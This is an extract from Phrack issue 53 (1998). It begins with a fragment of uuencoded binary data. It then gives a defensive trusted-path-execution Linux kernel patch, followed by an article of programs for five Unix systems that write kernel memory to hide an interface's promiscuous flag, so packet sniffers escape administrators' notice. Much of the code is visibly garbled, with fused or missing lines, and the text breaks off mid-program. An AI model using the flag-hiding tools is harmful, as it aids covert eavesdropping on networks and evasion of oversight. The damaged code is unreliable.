M\JZ-=?^+?@:Y___RKO?1*_F']_?&`0!T`J1)T>GSI7,!I))?7EW#58OLM$&+ M5@3-(7($,\#K!%#H3?]=PU6+[(M>!-'C]X=Z```(=!.X`@!0,\`STE!2_W8$ MZ&C_@\0(M$"+7@2+3@B+5@;-(7(/4(M>!-'C@8]Z```06.L$4.@&_UW#&0`# M`0$``0!;``,!)0`!`!<``P$\``$`'@`#`44``@`%``,!9``!`(0``P'%``$` M&``#`6($`@!L``,!4P0"`'(``P%*!`(`<0`#`3P$`@`I``,!%00"`#D`!0#B M`P$`!P(#`;D#`@!K``,!H0,"``8``P&:`P$`40`#`3(#`0!1``,!_0(!`%0` M`P'=`@$`50`#`=("`0!1``,!N`(!`%,``P&C`@$`50`#`74"`0"&``4`3P(! M`%P!`P'M`0(`;@`"`&8!`@!4```````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````#"X`17AP;&]R97(`7%-94U1%35P`4$]715)8+D1,3```<@1R!'($```! M(`(@`B`$H`*@________________________________________````$P(" M!`4&"`@(%!4%$_\6!1$"_________________P4%____________________ M_P__(P+_#_____\3__\"`@4/`O___Q/__________R/_____(_\3_P`````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` !```` ` end <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 08 of 15 -------------------------[ Linux Trusted Path Execution Redux --------[ Krzysztof G. Baranowski <kgb@manjak.knm.org.pl> ---[ Introduction The idea of trusted path execution is good, however the implementation which appeared in Phrack 52-06 may be a major annoyance even to the root itself, eg. old good INN newsserver keeps most of its control scripts in directories owned by news, so it would be not possible to run them, when the original TPE patch was applied. The better solution would be to have some kind of access list where one could add and delete users allowed to run programs. This can be very easily achieved, all you have to do is to write a kernel device driver, which would allow you to control the access list from userspace by using ioctl() syscalls. ---[ Implementation The whole implementation consists of a kernel patch and an userspace program. The patch adds a new driver to the kernel source tree and performs a few minor modifications. The driver registers itself as a character device called "tpe", with a major number of 40, so in /dev you must create a char device "tpe" with major number of 40 and a minor number of 0 (mknod /dev/tpe c 40 0). The most important parts of the driver are: a) access list of non-root users allowed to run arbitrary programs (empty by default, MAX_USERS can be increased in include/linux/tpe.h), b) tpe_verify() function, which checks whether a user should be allowed to run the program and optionally logs TPE violation attempts. The check if should we use tpe_verify() is done before the program will be executed in fs/exec.c. If user is not root we perform two checks and allow execution only in two cases: 1) if the directory is owned by root and is not group or world writable (this check covers binaries located in /bin, /usr/bin, /usr/local/bin/, etc...). 2) If the above check fails, we allow to run the program only if the user is on our access list, and the program is located in a directory owned by that user, which is not group or world writable. All other binaries are considered untrusted and will not be allowed to run. The logging of TPE violation attempts is a sysctl option (disabled by default). You can control it via /proc filesystem: echo 1 > /proc/sys/kernel/tpe will enable the logging: echo 0 > /proc/sys/kernel/tpe will turn it off. All these messages are logged at KERN_ALERT priority. c) tpe_ioctl() function, is our gate to/from the userspace. The driver supports three ioctls: 1) TPE_SCSETENT - add UID to the access list, 2) TPE_SCDELENT - delete UID from the access list, 3) TPE_SCGETENT - get entry from the access list. Only root is allowed to perform these ioctl()s. The userspace program called "tpadm" is very simple. It opens /dev/tpe and performs an ioctl() with arguments as given by user. ---[ In Conclusion Well, that's all. Except for the legal blurb [1]: "As usual, there are two main things to consider: 1. You get what you pay for. 2. It this I'd like to hear of it. Not only to have a great laugh, but also to make sure that you're the last RTFMing person to screw up. In short, e-mail your suggestions, corrections and / or horror stories to <kgb@manjak.knm.org.pl>." Krzysztof G. Baranowski - President of the Harmless Manyacs' Club <prezes@manjak.knm.org.pl> -- [1] My favorite one, taken from Linux kernel Documentation/sysctl/README, written by Rik van Riel <H.H.vanRiel@fys.ruu.nl>. ----[ The code <++> EX/tpe-0.02/Makefile # # Makefile for the Linux TPE Suite. # Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved. # # Change this to suit your requirements CC = gcc CFLAGS = -Wall -Wstrict-prototypes -g -O2 -fomit-frame-pointer \ -pipe -m386 all: tpadm patch tpadm: tpadm.c $(CC) $(CFLAGS) -o tpadm tpadm.c @strip tpadm patch: @echo @echo "You must patch, reconfigure, recompile your kernel" @echo "and create /dev/tpe (character, major 40, minor 0)" @echo clean: rm -f *.o core tpadm <--> <++> EX/tpe-0.02/tpeadm.c /* * tpe.c - tpe administrator * * 20:27:33 CEST 1998 * Initial release for alpha testing. * Revision 0.02: Sat Apr 11 21:58:06 CEST 1998 * Minor cosmetic fixes. * */ static const char *version = "0.02"; #include <linux/tpe.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <ctype.h> #include <stdio.h> #include <fcntl.h> #include <pwd.h> void banner(void) { fprintf(stdout, "TPE Administrator, version %s\n", version); fprintf(stdout, "Copyright (C) 1998 Krzysztof G. Baranowski. " "All rights reserved.\n"); fprintf(stdout, "Report bugs to <kgb@manjak.knm.org.pl>\n"); } void usage(const char *name) { banner(); fprintf(stdout, "\nUsage:\n\t%s command\n", name); fprintf(stdout, "\nCommands:\n" " -a username\t\tadd username to the access list\n" " -d username\t\tdelete username from the access list\n" " -s\t\t\tshow access list\n" " -h\t\t\tshow help\n" " -v\t\t\tshow version\n"); } void print_pwd(int pid) { struct passwd *pwd; pwd = getpwuid(pid); if (pwd != NULL) fprintf(stdout, " %d\t%s\t %s \n", pwd->pw_uid, pwd->pw_name, pwd->pw_gecos); } void print_entries(int fd) { int uid, i = 0; fprintf(stdout, "\n UID\tName\t Gecos \n"); fprintf(stdout, "-------------------------\n"); while (i < MAX_USERS) { uid = ioctl(fd, TPE_SCGETENT, i); if (uid > 0) print_pwd(uid); i++; } fprintf(stdout, "\n"); } int name2uid(const char *name) { struct passwd *pwd; pwd = getpwnam(name); if (pwd != NULL) return pwd->pw_uid; else { fprintf(stderr, "%s: no such user.\n", name); exit(EXIT_FAILURE); } } int add_entry(int fd, int uid) { int ret; errno = 0; ret = ioctl(fd, TPE_SCSETENT, uid); if (ret < 0) { fprintf(stderr, "Couldn't add entry: %s\n", strerror(errno)); exit(EXIT_FAILURE); } return 0; } int del_entry(int fd, int uid) { int ret; errno = 0; ret = ioctl(fd, TPE_SCDELENT, uid); if (ret < 0) { fprintf(stderr, "Couldn't delete entry: %s\n", strerror(errno)); exit(EXIT_FAILURE); } return 0; } int main(int argc, char **argv) { const char *name = "/dev/tpe"; char *add_arg = NULL; char *del_arg = NULL; int fd, c; errno = 0; if (argc <= 1) { fprintf(stderr, "%s: no command specified\n", argv[0]); fprintf(stderr, "Try `%s -h' for more information\n", argv[0]); exit(EXIT_FAILURE); } fd = open(name, O_RDWR); if (fd < 0) { fprintf(stderr, "Couldn't open file %s; %s\n", \ name, strerror(errno)); exit(EXIT_FAILURE); } opterr = 0; while ((c = getopt(argc, argv, "a:d:svh")) != EOF) switch (c) { case 'a': add_arg = optarg; add_entry(fd, name2uid(add_arg)); break; case 'd': del_arg = optarg; del_entry(fd, name2uid(del_arg)); break; case 's': print_entries(fd); break; case 'v': banner(); break; case 'h': usage(argv[0]); break; default : fprintf(stderr, "%s: illegal option\n", argv[0]); fprintf(stderr, "Try `%s -h' for more information\n", argv[0]); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } <--> <++> EX/tpe-0.02/kernel-tpe-2.0.32.diff diff -urN linux-2.0.32/Documentation/Configure.help linux/Documentation/Configure.help --- linux-2.0.32/Documentation/Configure.help Sat Sep 6 05:43:58 1997 +++ linux/Documentation/Configure.help Sat Apr 11 21:30:40 1998 @@ -3338,6 +3338,27 @@ serial mice, modems and similar devices connecting to the standard serial ports. . + A list of non-root users allowed to run binaries can be modified + by using program "tpadm". You should have received it with this + patch. If not please visit, + mail the author - Krzysztof G. Baranowski <kgb@manjak.knm.org.pl>, + or write it itself :-). This driver has been written as an enhancement + to route's <route@infonexus.cm> original patch. (a check in do_execve() + in fs/exec.c for trusted directories, ie. root owned and not group/world + writable). This option is useless on a single user machine. + Logging of trusted path execution violation is configurable via /proc + filesystem and turned off by default, to turn it on run you must run: + "echo 1 > /proc/sys/kernel/tpe". To turn it off: "echo 0 > /proc/sys/..." + Digiboard PC/Xx Support CONFIG_DIGI This is a driver for the Digiboard PC/Xe, PC/Xi, and PC/Xeve cards diff -urN linux-2.0.32/drivers/char/Config.in linux/drivers/char/Config.in --- linux-2.0.32/drivers/char/Config.in Tue Aug 12 22:06:54 1997 +++ linux/drivers/char/Config.in Sat Apr 11 21:30:53 1998 @@ -5,6 +5,9 @@ comment 'Character devices' tristate 'Standard/generic serial support' CONFIG_SERIAL +if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then + bool 'Trusted Path Execution (EXPERIMENTAL)' CONFIG_TPE +fi bool 'Digiboard PC/Xx Support' CONFIG_DIGI tristate 'Cyclades async mux support' CONFIG_CYCLADES bool 'Stallion multiport serial support' CONFIG_STALDRV diff -urN linux-2.0.32/drivers/char/Makefile linux/drivers/char/Makefile --- linux-2.0.32/drivers/char/Makefile Tue Aug 12 22:06:54 1997 +++ linux/drivers/char/Makefile Thu Apr 9 15:34:46 1998 @@ -34,6 +34,10 @@ endif endif +ifeq ($(CONFIG_TPE),y) +L_OBJS += tpe.o +endif + ifndef CONFIG_SUN_KEYBOARD L_OBJS += keyboard.o defkeymap.o endif diff -urN linux-2.0.32/drivers/char/tpe.c linux/drivers/char/tpe.c --- linux-2.0.32/drivers/char/tpe.c Thu Jan 1 01:00:00 1970 +++ linux/drivers/char/tpe.c Sat Apr 11 22:06:36 1998 @@ -0,0 +1,185 @@ +/* + * tpe.c - tpe driver + * + * 18:31:55 CEST 1998 + * Initial release for alpha testing. + * Revision 0.02: Sat Apr 11 21:32:33 CEST 1998 + * Replaced CONFIG_TPE_LOG with sysctl option. + * + */ + +static const char *version = "0.02"; + +#include <linux/version.h> +#include <linux/module.h> +#include <linux/kernel.h> +#include <linux/sched.h> +#include <linux/config.h> +#include <linux/tpe.h> +#include <linux/mm.h> +#include <linux/fs.h> + +static const char *tpe_dev = "tpe"; +static unsigned int tpe_major = 40; +static int tpe_users[MAX_USERS]; +int tpe_log = 0; /* sysctl boolean */ + +#if 0 +static void print_report(const char *info) +{ + int i = 0; + + printk("Report: %s\n", info); + while (i < MAX_USERS) { + printk("tpe_users[%d] = %d\n", i, tpe_users[i]); + i++; + } +} +#endif + +static int is_on_list(int uid) +{ + int i; + + for (i = 0; i < MAX_USERS; i++) { + if (tpe_users[i] == uid) + return 0; + } + return -1; +} + +int tpe_verify(unsigned short uid, struct inode *d_ino) +{ + if (((d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0) && (d_ino->i_uid == 0)) + return 0; + if ((is_on_list(uid) == 0) && (d_ino->i_uid == uid) && + (d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0) + return 0; + + if (tpe_log) + security_alert("Trusted path execution violation"); + return -1; +} + +static int tpe_find_entry(int uid) +{ + int i = 0; + + while (tpe_users[i] != uid && i < MAX_USERS) + i++; + if (i >= MAX_USERS) + return -1; + else + return i; +} + +static void tpe_revalidate(void) +{ + int temp[MAX_USERS]; + int i, j = 0; + + memset(temp, 0, sizeof(temp)); + for (i = 0; i < MAX_USERS; i++) { + if (tpe_users[i] != 0) { + temp[j] = tpe_users[i]; + j++; + } + } + memset(tpe_users, 0, sizeof(tpe_users)); + memcpy(tpe_users, temp, sizeof(temp)); +} + +static int add_entry(int uid) +{ + int i; + + if (uid <= 0) + return -EBADF; + if (!is_on_list(uid)) + return -EEXIST; + if ((i = tpe_find_entry(0)) != -1) { + tpe_users[i] = uid; + tpe_revalidate(); + return 0; + } else + return -ENOSPC; +} + +static int del_entry(int uid) +{ + int i; + + if (uid <= 0) + return -EBADF; + if (is_on_list(uid)) + return -EBADF; + i = tpe_find_entry(uid); + tpe_users[i] = 0; + tpe_revalidate(); + return 0; +} + +static int tpe_ioctl(struct inode *inode, struct file *file, + unsigned int cmd, unsigned long arg) +{ + int argc = (int) arg; + int retval; + + if (!suser()) + return -EPERM; + switch (cmd) { + case TPE_SCSETENT: + retval = add_entry(argc); + return retval; + case TPE_SCDELENT: + retval = del_entry(argc); + return retval; + case TPE_SCGETENT: + return tpe_users[argc]; + default: + return -EINVAL; + } +} + +static int tpe_open(struct inode *inode, struct file *file) +{ + return 0; +} + +static void tpe_close(struct inode *inode, struct file *file) +{ + /* dummy */ +} + +static struct file_operations tpe_fops = { + NULL, /* llseek */ + NULL, /* read */ + NULL, /* write */ + NULL, /* readdir */ + NULL, /* select */ + tpe_ioctl, /* ioctl*/ + NULL, /* mmap */ + tpe_open, /* open */ + tpe_close, /* release */ +}; + +int tpe_init(void) +{ + int result; + + tpe_revalidate(); + if ((result = register_chrdev(tpe_major, tpe_dev, &tpe_fops)) != 0) + return result; + printk(KERN_INFO "TPE %s subsystem initialized... " + "(C) 1998 Krzysztof G. Baranowski\n", version); + return 0; +} diff -urN linux-2.0.32/drivers/char/tty_io.c linux/drivers/char/tty_io.c --- linux-2.0.32/drivers/char/tty_io.c Tue Sep 16 18:36:49 1997 +++ linux/drivers/char/tty_io.c Thu Apr 9 15:34:46 1998 @@ -2030,6 +2030,9 @@ #ifdef CONFIG_SERIAL rs_init(); #endif +#ifdef CONFIG_TPE + tpe_init(); +#endif #ifdef CONFIG_SCC scc_init(); #endif diff -urN linux-2.0.32/fs/exec.c linux/fs/exec.c --- linux-2.0.32/fs/exec.c Fri Nov 7 18:57:30 1997 +++ linux/fs/exec.c Fri Apr 10 14:02:02 1998 @@ -47,6 +47,11 @@ #ifdef CONFIG_KERNELD #include <linux/kerneld.h> #endif +#ifdef CONFIG_TPE +extern int tpe_verify(unsigned short uid, struct inode *d_ino); +extern int dir_namei(const char *pathname, int *namelen, const char **name, + struct inode *base, struct inode **res_inode); +#endif asmlinkage int sys_exit(int exit_code); asmlinkage int sys_brk(unsigned long); @@ -652,12 +657,29 @@ + */ + if (!suser()) { + dir_namei(filename, &namelen, &basename, NULL, &dir); + if (tpe_verify(current->uid, dir)) + return -EACCES; + } +#endif /* CONFIG_TPE */ + retval = open_namei(filename, 0, 0, &bprm.inode, NULL); if (retval) return retval; diff -urN linux-2.0.32/fs/namei.c linux/fs/namei.c --- linux-2.0.32/fs/namei.c Sun Aug 17 01:23:19 1997 +++ linux/fs/namei.c Thu Apr 9 15:34:46 1998 @@ -216,8 +216; diff -urN linux-2.0.32/include/linux/sysctl.h linux/include/linux/sysctl.h --- linux-2.0.32/include/linux/sysctl.h Tue Aug 12 23:06:35 1997 +++ linux/include/linux/sysctl.h Sat Apr 11 22:04:13 1998 @@ -61,6 +61,7 @@ #define KERN_NFSRADDRS 18 /* NFS root addresses */ #define KERN_JAVA_INTERPRETER 19 /* path to Java(tm) interpreter */ #define KERN_JAVA_APPLETVIEWER 20 /* path to Java(tm) appletviewer */ +#define KERN_TPE 21 /* TPE logging */ /* CTL_VM names: */ #define VM_SWAPCTL 1 /* struct: Set vm swapping control */ diff -urN linux-2.0.32/include/linux/tpe.h linux/include/linux/tpe.h --- linux-2.0.32/include/linux/tpe.h Thu Jan 1 01:00:00 1970 +++ linux/include/linux/tpe.h Thu Apr 9 15:34:46 1998 @@ -0,0 +1,47 @@ +/* + * tpe.h - misc common stuff + * + *. + * + */ + +#ifndef __TPE_H__ +#define __TPE_H__ + +#ifdef __KERNEL__ +/* Taken from Solar Designers' <solar@false.com> non executable stack patch */ +__ */ + +/* size of tpe_users array */ +#define MAX_USERS 32 + +/* ioctl */ +#define TPE_SCSETENT 0x3137 +#define TPE_SCDELENT 0x3138 +#define TPE_SCGETENT 0x3139 + +#endif /* __TPE_H__ */ diff -urN linux-2.0.32/include/linux/tty.h linux/include/linux/tty.h --- linux-2.0.32/include/linux/tty.h Tue Nov 18 20:46:44 1997 +++ linux/include/linux/tty.h Sat Apr 11 21:45:20 1998 @@ -283,6 +283,7 @@ extern unsigned long con_init(unsigned long); extern int rs_init(void); +extern int tpe_init(void); extern int lp_init(void); extern int pty_init(void); extern int tty_init(void); diff -urN linux-2.0.32/kernel/sysctl.c linux/kernel/sysctl.c --- linux-2.0.32/kernel/sysctl.c Thu Aug 14 00:02:42 1997 +++ linux/kernel/sysctl.c Sat Apr 11 21:40:03 1998 @@ -26,6 +26,9 @@ /* External variables not in a header file. */ extern int panic_timeout; +#ifdef CONFIG_TPE +extern int tpe_log; +#endif #ifdef CONFIG_ROOT_NFS #include <linux/nfs_fs.h> @@ -147,6 +150,10 @@ 64, 0644, NULL, &proc_dostring, &sysctl_string }, {KERN_JAVA_APPLETVIEWER, "java-appletviewer", binfmt_java_appletviewer, 64, 0644, NULL, &proc_dostring, &sysctl_string }, +#endif +#ifdef CONFIG_TPE + {KERN_TPE, "tpe", &tpe_log, sizeof(int), + 0644, NULL, &proc_dointvec}, #endif {0} }; <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 10 of 15 -------------------------[ Interface Promiscuity Obscurity --------[ apk <apk@itl.waw.pl> ----[ INTRODUCTION Normally, when you put an interface into promiscuous mode, it sets a flag in the device interface structure telling the world (or anyone who wants to check) that the device, is indeed, in promiscuous mode. This is, of course, annoying to those of you who want to obscure this fact from prying administrative eyes. Behold intrepid hacker, your salvation is at hand. The following modules for FreeBSD, Linux, HP-UX, IRIX and Solaris allow you to obscure the IFF_PROMISC bit and run all your wonderful little packet sniffers incognito... ----[ IMPLEMENTATION DETAILS Usage of the code is simple. After you put the interface into promiscuous mode, you can clean the IFF_PROMISC flag with: `./i <interface> 0` and reset the flag with: `./i <interface> 1`. Note that these programs only change interface's flag value, they don't affect NIC status. On systems which allow setting promiscuous mode by SIOCSIFFLAGS however, any call to SIOCSIFFLAGS will make the change take effect (e.g. after clearing promisc flag: 'ifconfig <interface> up' will really turn off promiscuous mode). Systems for which above is true are: FreeBSD, Linux, Irix. On these three you can run a sniffer in non-promiscuous mode, and then some time later set IFF_PROIMISC on the interface, then with the above command set promiscuous mode for interface. This is most useful on FreeBSD because in doing this you won't get that annoying `promiscuous mode enabled for <interface>' message in the dmesg buffer (it's only logged when you enable promiscuous mode via bpf by BIOCPROMISC). On Solaris, every alias has its own flags, so you can set flags for any alias: 'interface[:<alias number>]' (because Solaris doesn't set IFF_PROMISC when you turn on promiscuous mode using DLPI you don't need this program however). ----[ THE CODE <++> EX/promisc/freebsd-p.c /* * promiscuous flag changer v0.1, apk * FreeBSD version, compile with -lkvm * * usage: promisc [interface 0|1] * * note: look at README for notes */ #ifdef __FreeBSD__ # include <osreldate.h> # if __FreeBSD_version >= 300000 # define FBSD3 # endif #endif #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <net/if.h> #ifdef FBSD3 # include <net/if_var.h> #endif OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2" \ "\20MULTICAST" struct nlist nl[] = { { "_ifnet" }, #define N_IFNET[]) { #ifdef FBSD3 struct ifnethead ifh; #endif struct ifnet ifn, *ifp; char ifname[IFNAMSIZ]; int unit, promisc, i, any; char *interface, *cp; kvm_t *kd;_IFNET].n_type == 0) { printf("Cannot find symbol: %s\n", nl[N_IFNET].n_name); exit(1); } #ifdef FBSD3 if (kread(kd, nl[N_IFNET].n_value, &ifh, sizeof(ifh)) == -1) { perror("kread"); exit(1); } ifp = ifh.tqh_first; #else if (kread(kd, nl[N_IFNET].n_value, &ifp, sizeof(ifp)) == -1) { perror("kread"); exit(1); } if (kread(kd, (u_long)ifp, &ifp, sizeof(ifp)) == -1) { perror("kread"); exit(1); } #endif #ifdef FBSD3 for (; ifp; ifp = ifn.if_link.tqe_next) { #else for (; ifp; ifp = ifn.if_next) { #endif if (kread(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) { perror("kread"); break; } if (kread(kd, (u_long)ifn.if_name, ifname, sizeof(ifname)) == -1) { perror("kread"); break; } printf("%d: %s%d, flags=0x%x ", ifn.if_index, ifname, ifn.if_unit, (unsigned short)ifn.if_flags); /* this is from ifconfig sources */(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) perror("kwrite"); } break; default: if ((ifn.if_flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s%d: setting IFF_PROMISC\n", ifname, unit); ifn.if_flags |= IFF_PROMISC; if (kwrite(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) perror("kwrite"); } break; } } } } <--> <++> EX/promisc/hpux-p.c /* * promiscuous flag changer v0.1, apk * HP-UX version, on HP-UX 9.x compile with -DHPUX9 * * usage: promisc [interface 0|1] * * note: look at README for notes */ /* #define HPUX9 on HP-UX 9.x */ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <nlist.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #ifndef HPUX9 # define PATH_VMUNIX "/stand/vmunix" #else # define PATH_VMUNIX "/hp-ux" #endif " struct nlist nl[] = { { "ifnet" }, #define N_IFNET 0 { "" } }; int kread(fd, addr, buf, len) int fd, len; off_t addr; void *buf; { int c; if (lseek(fd, addr, SEEK_SET) == -1) return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(fd, addr, buf, len) int fd, len; off_t addr; void *buf; { int c; if (lseek(fd, addr, SEEK_SET) == -1) (nlist(PATH_VMUNIX, nl) == -1) {/irix-p.c /* * promiscuous flag changer v0.1, apk * Irix version, on Irix 6.x compile with -lelf, on 5.x with -lmld * * usage: promisc [interface 0|1] * * note: look at README for notes on irix64 compile with -DI64 -64 */ /* #define I64 for Irix64*/ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <nlist.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define PATH_VMUNIX "/unix" " #ifdef I64 struct nlist64 nl[] = { #else struct nlist nl[] = { #endif { "ifnet" }, #define N_IFNET 0 { "" } }; int kread(int fd, off_t addr, void *buf, int len) { int c; #ifdef I64 if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) #else if (lseek(fd, (off_t)addr, SEEK_SET) == -1) #endif return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(int fd, off_t addr, void *buf, int len) { int c; #ifdef I64 if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) #else if (lseek(fd, (off_t)addr, SEEK_SET) == -1) #endifdef I64 if (nlist64(PATH_VMUNIX, nl) == -1) { #else if (nlist(PATH_VMUNIX, nl) == -1) { #endif/linux-p.c /* * promiscuous flag changer v0.1, apk * Linux version * * usage: promisc [interface 0|1] * * note: look at README for notes */ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #define __KERNEL__ #include <linux/netdevice.h> #undef __KERNEL__ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define HEAD_NAME "dev_base" #define PATH_KSYMS "/proc/ksyms" #define PATH_KMEM "/dev/mem" #define IFFBITS \ "\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \ "\10NOARP\11PROMISC\12ALLMULTI\13MASTER\14SLAVE\15MULTICAST" int kread(int fd, u_long addr, void *buf, int len) { int c; if (lseek(fd, (off_t)addr, SEEK_SET) == -1) return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(int fd, u_long addr, void *buf, int len) { int c; if (lseek(fd, (off_t)addr, SEEK_SET) == -1) return -1; if ((c = write(fd, buf, len)) != len) return -1; return c; } void usage(char *s) { printf("usage: %s [interface 0|1]\n", s); exit(1); } main(int argc, char *argv[]) { struct device devn, *devp; char ifname[IFNAMSIZ]; int fd, unit, promisc, i, any; char *interface, *cp; FILE *fp; char line[256], symname[256]; switch (argc) { case 1: promisc = -1; interface = NULL; break; case 3: interface = argv[1]; unit = 0; if ((cp = strchr(interface, ':')) != NULL) { *cp++ = 0; unit = strtol(cp, NULL, 10); } promisc = atoi(argv[2]); break; default: usage(argv[0]); } if ((fp = fopen(PATH_KSYMS, "r")) == NULL) { perror(PATH_KSYMS); exit(1); } devp = NULL; while (fgets(line, sizeof(line), fp) != NULL && sscanf(line, "%x %s", &i, symname) == 2) if (strcmp(symname, HEAD_NAME) == 0) { devp = (struct device *)i; break; } fclose(fp); if (devp == NULL) { printf("Cannot find symbol: %s\n", HEAD_NAME); exit(1); } if ((fd = open(PATH_KMEM, O_RDWR)) == -1) { perror(PATH_KMEM); exit(1); } if (kread(fd, (u_long)devp, &devp, sizeof(devp)) == -1) { perror("kread"); exit(1); } for (; devp; devp = devn.next) { if (kread(fd, (u_long)devp, &devn, sizeof(devn)) == -1) { perror("kread"); break; } if (kread(fd, (u_long)devn.name, ifname, sizeof(ifname)) == -1) { perror("kread"); break; } printf("%s: flags=0x%x ", ifname, devn.flags); cp = IFFBITS; any = 0; putchar('<'); while ((i = *cp++) != 0) { if (devn.flags & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; *cp > 32; ) putchar(*cp++); } else for (; *cp > 32; cp++) ; } putchar('>'); putchar('\n'); /* This sux */ /* if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {*/ if (interface && strcmp(interface, ifname) == 0) { switch (promisc) { case -1: break; case 0: if ((devn.flags & IFF_PROMISC) == 0) printf("\tIFF_PROMISC not set\n"); else { printf("\t%s: clearing IFF_PROMISC\n", ifname); devn.flags &= ~IFF_PROMISC; if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) break; } break; default: if ((devn.flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s: setting IFF_PROMISC\n", ifname); devn.flags |= IFF_PROMISC; if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) break; } } } } } <--> <++> EX/promisc/socket-p.c /* * This is really dumb program. * Works on Linux, FreeBSD and Irix. * Check README for comments. */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <sys/ioctl.h> #include <net/if.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { int sd; struct ifreq ifr; char *interface; int promisc; if (argc != 3) { printf("usage: %s interface 0|1\n", argv[0]); exit(1); } interface = argv[1]; promisc = atoi(argv[2]); if ((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("socket"); exit(1); } strncpy(ifr.ifr_name, interface, IFNAMSIZ); if (ioctl(sd, SIOCGIFFLAGS, &ifr) == -1) { perror("SIOCGIFFLAGS"); exit(1); } printf("flags = 0x%x\n", (u_short)ifr.ifr_flags); if (promisc) ifr.ifr_flags |= IFF_PROMISC; else ifr.ifr_flags &= ~IFF_PROMISC; if (ioctl(sd, SIOCSIFFLAGS, &ifr) == -1) { perror("SIOCSIFFLAGS"); exit(1); } close(sd); } <--> <++> EX/promisc/solaris-p.c /* * promiscuous flag changer v0.1, apk * Solaris version, compile with -lkvm -lelf * * usage: promisc [interface 0|1] * (interface has "interface[:<alias number>]" format, e.g. le0:1 or le0) * * note: look at README for notes because DLPI promiscuous request doesn't * set IFF_PROMISC this version is kinda useless. */ #include <sys/types.h> #include <sys/time.h> #include <sys/stream.h> #include <sys/socket.h> #include <net/if.h> #define _KERNEL #include <inet/common.h> #include <inet/led.h> #include <inet/ip.h> #undef _KERNEL INTELLIGENT\14MULTICAST\15MULTI_BCAST" \ "\16UNNUMBERED\17PRIVATE" struct nlist nl[] = { { "ill_g_head" }, #define N_ILL_G_HEAD[]) { ill_t illn, *illp; ipif_t ipifn, *ipifp; char ifname[IFNAMSIZ]; /* XXX IFNAMSIZ? */ int unit, promisc, i, any; char *interface, *cp; kvm_t *kd; switch (argc) { case 1: promisc = -1; interface = NULL; break; case 3: interface = argv[1]; unit = 0; if ((cp = strchr(interface, ':')) != NULL) { *cp++ = 0; unit = strtol(cp, NULL, 10); }_ILL_G_HEAD].n_type == 0) { printf("Cannot find symbol: %s\n", nl[N_ILL_G_HEAD].n_name); exit(1); } if (kread(kd, nl[N_ILL_G_HEAD].n_value, &illp, sizeof(illp)) == -1) { perror("kread"); exit(1); } for (; illp; illp = illn.ill_next) { if (kread(kd, (u_long)illp, &illn, sizeof(illn)) == -1) { perror("kread"); break; } if (kread(kd, (u_long)illn.ill_name, ifname, sizeof(ifname)) == -1) { perror("kread"); break; } ipifp = illn.ill_ipif; /* on Solaris you can set different flags for every alias, so we do */ for (; ipifp; ipifp = ipifn.ipif_next) { if (kread(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) { perror("kread"); break; } printf("%s:%d, flags=0x%x ", ifname, ipifn.ipif_id, ipifn.ipif_flags); cp = IFFBITS; any = 0; putchar('<'); while ((i = *cp++) != 0) { if (ipifn.ipif_flags & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; *cp > 32; ) putchar(*cp++); } else for (; *cp > 32; cp++) 